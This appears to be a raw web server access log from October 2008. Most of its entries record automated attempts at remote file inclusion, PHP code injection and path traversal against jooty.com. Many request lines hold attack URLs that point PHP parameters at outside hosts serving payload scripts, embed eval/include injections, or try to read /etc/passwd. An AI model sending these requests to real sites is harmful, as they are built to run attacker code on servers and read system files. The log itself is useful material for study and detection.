203.194.205.6 - - [11/Oct/2008:05:00:09 -0700] "GET /logs/access_080816.log//index.php?view=page&pagename=http://www.geocities.com/kalekek23/crutz.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
71.245.171.108 - - [11/Oct/2008:05:00:12 -0700] "GET /logs/access_080824.log/errors.php?error=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
219.73.53.186 - - [11/Oct/2008:05:01:38 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "jooty.com"
87.118.116.170 - - [11/Oct/2008:05:03:04 -0700] "GET /logs/access_080926.log//poll/poll_ssi.php?include_path=http://daniele-dm.siteburg.com/controllo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
203.194.205.6 - - [11/Oct/2008:05:04:09 -0700] "GET /logs/access_080816.log//index.php?view=page&pagename=http://not-network.com/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
203.194.205.6 - - [11/Oct/2008:05:04:15 -0700] "GET /logs/access_080816.log//index.php?view=page&pagename=http://not-network.com/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
212.48.105.13 - - [11/Oct/2008:05:04:26 -0700] "GET /logs/access.log/errors.php?error=http://www.t-tac.com/bbs/avatar/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.jooty.com"
212.48.105.13 - - [11/Oct/2008:05:04:26 -0700] "GET /errors.php?error=http://www.t-tac.com/bbs/avatar/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.jooty.com"
212.48.105.13 - - [11/Oct/2008:05:04:56 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.t-tac.com/bbs/avatar/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.jooty.com"
212.48.105.13 - - [11/Oct/2008:05:04:56 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.t-tac.com/bbs/avatar/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.jooty.com"
202.172.170.37 - - [11/Oct/2008:05:05:30 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=com_wrapper&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
202.172.170.37 - - [11/Oct/2008:05:05:31 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_wrapper&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
202.172.170.37 - - [11/Oct/2008:05:05:31 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_wrapper&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
195.207.17.5 - - [11/Oct/2008:05:06:39 -0700] "GET /mwchat/libs/errors.php?error=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.jooty.com"
195.207.17.5 - - [11/Oct/2008:05:06:39 -0700] "GET /mwchat/libs/errors.php?error=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.jooty.com"
202.172.170.37 - - [11/Oct/2008:05:06:42 -0700] "GET /logs/access.log/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
202.172.170.37 - - [11/Oct/2008:05:06:43 -0700] "GET /errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
202.172.170.37 - - [11/Oct/2008:05:06:44 -0700] "GET /logs/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
72.9.247.34 - - [11/Oct/2008:05:06:57 -0700] "GET /?sourcedir=http://geoforum.global-enterpriseonline.com/chat/mstid.txt? HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.jooty.com"
203.194.205.6 - - [11/Oct/2008:05:06:58 -0700] "GET /logs/access_080928.log%20//index.php?view=page&pagename=http://www.geocities.com/kalekek23/crutz.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
69.248.147.137 - - [11/Oct/2008:05:07:03 -0700] "GET /logs/index.php?view=page&pagename=http://r00tcrew.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.jooty.com"
69.248.147.137 - - [11/Oct/2008:05:07:03 -0700] "GET /logs/access_080928.log%20/index.php?view=page&pagename=http://r00tcrew.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.jooty.com"
69.248.147.137 - - [11/Oct/2008:05:07:03 -0700] "GET /index.php?view=page&pagename=http://r00tcrew.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.jooty.com"
203.194.205.6 - - [11/Oct/2008:05:07:12 -0700] "GET /logs/access_080928.log%20//index.php?view=page&pagename=http://www.geocities.com/kalekek23/crutz.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
87.233.172.64 - - [11/Oct/2008:05:07:22 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://quiroga.presencia.net/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
98.114.75.233 - - [11/Oct/2008:05:07:29 -0700] "GET /logs/access_080928.log%20/index.php?view=page&pagename=http://r00tcrew.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.jooty.com"
98.114.75.233 - - [11/Oct/2008:05:07:29 -0700] "GET /index.php?view=page&pagename=http://r00tcrew.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.jooty.com"
98.114.75.233 - - [11/Oct/2008:05:07:29 -0700] "GET /logs/index.php?view=page&pagename=http://r00tcrew.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.jooty.com"
80.190.202.150 - - [11/Oct/2008:05:07:42 -0700] "GET /mwchat/libs/errors.php?error=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
80.190.202.150 - - [11/Oct/2008:05:07:42 -0700] "GET /mwchat/libs/errors.php?error=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
69.28.145.179 - - [11/Oct/2008:05:08:04 -0700] "GET /logs/access_080928.log%20/index.php?view=page&pagename=http://r00tcrew.webcindario.com/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
69.28.145.179 - - [11/Oct/2008:05:08:04 -0700] "GET /index.php?view=page&pagename=http://r00tcrew.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
69.28.145.179 - - [11/Oct/2008:05:08:04 -0700] "GET /logs/index.php?view=page&pagename=http://r00tcrew.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
98.202.67.0 - - [11/Oct/2008:05:08:35 -0700] "GET /logs/access_080928.log%20/index.php?view=page&pagename=http://r00tcrew.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
98.202.67.0 - - [11/Oct/2008:05:08:35 -0700] "GET /logs/index.php?view=page&pagename=http://r00tcrew.webcindario.com/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
98.202.67.0 - - [11/Oct/2008:05:08:35 -0700] "GET /index.php?view=page&pagename=http://r00tcrew.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
202.172.170.37 - - [11/Oct/2008:05:08:39 -0700] "GET /errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
87.233.172.64 - - [11/Oct/2008:05:08:41 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://quiroga.presencia.net/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jooty.com"
87.233.172.64 - - [11/Oct/2008:05:08:41 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://quiroga.presencia.net/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jooty.com"
87.233.172.64 - - [11/Oct/2008:05:08:41 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://quiroga.presencia.net/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jooty.com"
69.28.145.179 - - [11/Oct/2008:05:08:54 -0700] "GET /logs/access_080928.log/index.php?view=page&pagename=http://r00tcrew.webcindario.com/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
98.145.117.130 - - [11/Oct/2008:05:09:00 -0700] "GET /logs/index.php?view=page&pagename=http://r00tcrew.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.jooty.com"
98.145.117.130 - - [11/Oct/2008:05:09:01 -0700] "GET /logs/access_080928.log/index.php?view=page&pagename=http://r00tcrew.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.jooty.com"
98.145.117.130 - - [11/Oct/2008:05:09:03 -0700] "GET /index.php?view=page&pagename=http://r00tcrew.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.jooty.com"
69.248.147.137 - - [11/Oct/2008:05:09:17 -0700] "GET /logs/access_080928.log/index.php?view=page&pagename=http://r00tcrew.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.jooty.com"
98.114.75.233 - - [11/Oct/2008:05:10:12 -0700] "GET /logs/access_080928.log/index.php?view=page&pagename=http://r00tcrew.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.jooty.com"
72.9.238.98 - - [11/Oct/2008:05:10:20 -0700] "GET /logs/access_080926.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
69.28.145.179 - - [11/Oct/2008:05:10:34 -0700] "GET /logs/access_080816.log/index.php?view=page&pagename=http://r00tcrew.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:05:10:35 -0700] "GET /mwchat/libs/errors.php?error=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:05:10:35 -0700] "GET /mwchat/libs/errors.php?error=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
212.48.105.13 - - [11/Oct/2008:05:10:40 -0700] "GET /errors.php?error=http://www.t-tac.com/bbs/avatar/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.jooty.com"
216.97.235.15 - - [11/Oct/2008:05:11:14 -0700] "GET /logs/access_080923.log/index2.php?option=com_rss&Itemid=&mosConfig_absolute_path=http://www.sweetdreamestates.com/forum/vbrss.php/htaccess/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.jooty.com"
216.97.235.15 - - [11/Oct/2008:05:11:14 -0700] "GET /logs/index2.php?option=com_rss&Itemid=&mosConfig_absolute_path=http://www.sweetdreamestates.com/forum/vbrss.php/htaccess/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.jooty.com"
98.145.117.130 - - [11/Oct/2008:05:11:44 -0700] "GET /logs/access_080816.log/index.php?view=page&pagename=http://r00tcrew.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.jooty.com"
195.207.17.5 - - [11/Oct/2008:05:11:47 -0700] "GET /logs/access_080822.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.jooty.com"
195.207.17.5 - - [11/Oct/2008:05:11:47 -0700] "GET /logs/access_080822.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.jooty.com"
195.207.17.5 - - [11/Oct/2008:05:11:47 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.jooty.com"
195.207.17.5 - - [11/Oct/2008:05:11:48 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.jooty.com"
195.207.17.5 - - [11/Oct/2008:05:11:48 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.jooty.com"
195.207.17.5 - - [11/Oct/2008:05:11:48 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.jooty.com"
98.202.67.0 - - [11/Oct/2008:05:12:09 -0700] "GET /logs/access_080928.log/index.php?view=page&pagename=http://r00tcrew.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
87.233.172.64 - - [11/Oct/2008:05:12:28 -0700] "GET /logs/access_080923.log//admin/business_inc/saveserver.php?thisdir=http://quiroga.presencia.net/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
87.233.172.64 - - [11/Oct/2008:05:12:29 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://quiroga.presencia.net/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
87.233.172.64 - - [11/Oct/2008:05:12:29 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://quiroga.presencia.net/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
98.145.117.130 - - [11/Oct/2008:05:12:49 -0700] "GET /logs/access_080928.log%20/index.php?view=page&pagename=http://r00tcrew.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.jooty.com"
202.172.170.37 - - [11/Oct/2008:05:14:42 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_wrapper&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
216.97.235.15 - - [11/Oct/2008:05:14:56 -0700] "GET /logs/access.log/index2.php?option=com_rss&Itemid=&mosConfig_absolute_path=http://www.sweetdreamestates.com/forum/vbrss.php/htaccess/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.jooty.com"
217.116.232.250 - - [11/Oct/2008:05:15:18 -0700] "GET /logs/access.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.dvdflex.ch/portail/components/com_akocomment/images/r0x.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
217.116.232.250 - - [11/Oct/2008:05:15:18 -0700] "GET /logs/access.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.dvdflex.ch/portail/components/com_akocomment/images/r0x.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
217.116.232.250 - - [11/Oct/2008:05:15:19 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.dvdflex.ch/portail/components/com_akocomment/images/r0x.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
217.116.232.250 - - [11/Oct/2008:05:15:19 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.dvdflex.ch/portail/components/com_akocomment/images/r0x.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
217.116.232.250 - - [11/Oct/2008:05:15:19 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.dvdflex.ch/portail/components/com_akocomment/images/r0x.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
217.116.232.250 - - [11/Oct/2008:05:15:19 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.dvdflex.ch/portail/components/com_akocomment/images/r0x.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
69.248.147.137 - - [11/Oct/2008:05:15:33 -0700] "GET /logs/access_080816.log/index.php?view=page&pagename=http://r00tcrew.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.jooty.com"
217.116.232.250 - - [11/Oct/2008:05:16:20 -0700] "GET /logs/access_080924.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.dvdflex.ch/portail/components/com_akocomment/images/r0x.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
217.116.232.250 - - [11/Oct/2008:05:16:22 -0700] "GET /logs/access_080924.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.dvdflex.ch/portail/components/com_akocomment/images/r0x.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
65.55.208.58 - - [11/Oct/2008:05:17:27 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.jooty.com"
65.55.208.58 - - [11/Oct/2008:05:17:27 -0700] "GET /logs/access_081005.log HTTP/1.1" 200 1245184 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.jooty.com"
65.55.208.58 - - [11/Oct/2008:05:17:28 -0700] "GET /logs/access_080920.log HTTP/1.1" 200 1179648 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.jooty.com"
195.207.17.5 - - [11/Oct/2008:05:17:29 -0700] "GET /logs/access_080826.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.jooty.com"
195.207.17.5 - - [11/Oct/2008:05:17:29 -0700] "GET /logs/access_080826.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.jooty.com"
98.210.195.32 - - [11/Oct/2008:05:18:01 -0700] "GET /index.php?view=page&pagename=http://r00tcrew.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.jooty.com"
98.210.195.32 - - [11/Oct/2008:05:18:01 -0700] "GET /logs/index.php?view=page&pagename=http://r00tcrew.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.jooty.com"
98.210.195.32 - - [11/Oct/2008:05:18:04 -0700] "GET /logs/access_080928.log/index.php?view=page&pagename=http://r00tcrew.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.jooty.com"
98.114.75.233 - - [11/Oct/2008:05:18:08 -0700] "GET /logs/access_080816.log/index.php?view=page&pagename=http://r00tcrew.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.jooty.com"
87.118.116.170 - - [11/Oct/2008:05:18:24 -0700] "GET /logs/access_080924.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.equal-lighthouse.net/components/com_extcalendar/languages/italian/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
80.190.202.150 - - [11/Oct/2008:05:18:54 -0700] "GET /logs/access_080822.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
80.190.202.150 - - [11/Oct/2008:05:18:55 -0700] "GET /logs/access_080822.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
87.253.132.7 - - [11/Oct/2008:05:19:47 -0700] "GET /playing.php/common/db.php?commonpath=http://antiemo.nl/community/system/cache/pictures/test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.jooty.com"
87.253.132.7 - - [11/Oct/2008:05:19:48 -0700] "GET /logs/playing.php/common/db.php?commonpath=http://antiemo.nl/community/system/cache/pictures/test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.jooty.com"
202.172.170.37 - - [11/Oct/2008:05:21:28 -0700] "GET /logs/access_080920.log/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
87.118.116.170 - - [11/Oct/2008:05:21:39 -0700] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.equal-lighthouse.net/components/com_extcalendar/languages/italian/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
87.253.132.7 - - [11/Oct/2008:05:23:09 -0700] "GET /ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://antiemo.nl/community/system/cache/pictures/test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.jooty.com"
87.253.132.7 - - [11/Oct/2008:05:23:10 -0700] "GET /logs/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://antiemo.nl/community/system/cache/pictures/test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.jooty.com"
98.210.195.32 - - [11/Oct/2008:05:26:11 -0700] "GET /logs/access_080816.log/index.php?view=page&pagename=http://r00tcrew.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:05:26:49 -0700] "GET /logs/access_080822.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:05:26:49 -0700] "GET /logs/access_080822.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:05:26:50 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:05:26:50 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:05:26:50 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:05:26:50 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
71.62.41.224 - - [11/Oct/2008:05:27:39 -0700] "GET /logs/access_080731.log//phphost_directoryv2/include/admin.php?rd=http://gabifir.ucoz.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
71.62.41.224 - - [11/Oct/2008:05:27:39 -0700] "GET /phphost_directoryv2/include/admin.php?rd=http://gabifir.ucoz.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
71.62.41.224 - - [11/Oct/2008:05:27:40 -0700] "GET /logs//phphost_directoryv2/include/admin.php?rd=http://gabifir.ucoz.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
200.11.67.242 - - [11/Oct/2008:05:27:45 -0700] "GET /logs/access_080919.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://alb0z.freehostia.com/kosova.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.jooty.com"
200.11.67.242 - - [11/Oct/2008:05:27:45 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://alb0z.freehostia.com/kosova.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.jooty.com"
200.11.67.242 - - [11/Oct/2008:05:27:46 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://alb0z.freehostia.com/kosova.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.jooty.com"
200.199.75.194 - - [11/Oct/2008:05:27:57 -0700] "GET /logs/access.log///mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://books.siteburg.com/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
200.199.75.194 - - [11/Oct/2008:05:27:57 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://books.siteburg.com/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
200.199.75.194 - - [11/Oct/2008:05:27:57 -0700] "GET /logs///mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://books.siteburg.com/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
71.62.41.224 - - [11/Oct/2008:05:28:05 -0700] "GET /logs/access_080822.log//phphost_directoryv2/include/admin.php?rd=http://gabifir.ucoz.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
121.170.11.100 - - [11/Oct/2008:05:28:34 -0700] "GET /logs/access.log/index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.geocities.com/kucluk_pamungkas/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
121.170.11.100 - - [11/Oct/2008:05:28:35 -0700] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.geocities.com/kucluk_pamungkas/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
121.170.11.100 - - [11/Oct/2008:05:28:36 -0700] "GET /logs/index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.geocities.com/kucluk_pamungkas/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
72.232.238.242 - - [11/Oct/2008:05:28:41 -0700] "GET /logs/access.log//main.php?sayfa=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "jooty.com"
72.232.238.242 - - [11/Oct/2008:05:28:41 -0700] "GET /logs//main.php?sayfa=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "jooty.com"
72.232.238.242 - - [11/Oct/2008:05:28:41 -0700] "GET /main.php?sayfa=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "jooty.com"
72.232.238.242 - - [11/Oct/2008:05:28:43 -0700] "GET /main.php?sayfa=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "jooty.com"
72.232.238.242 - - [11/Oct/2008:05:28:43 -0700] "GET /logs/access.log//main.php?sayfa=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "jooty.com"
72.232.238.242 - - [11/Oct/2008:05:28:43 -0700] "GET /logs//main.php?sayfa=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "jooty.com"
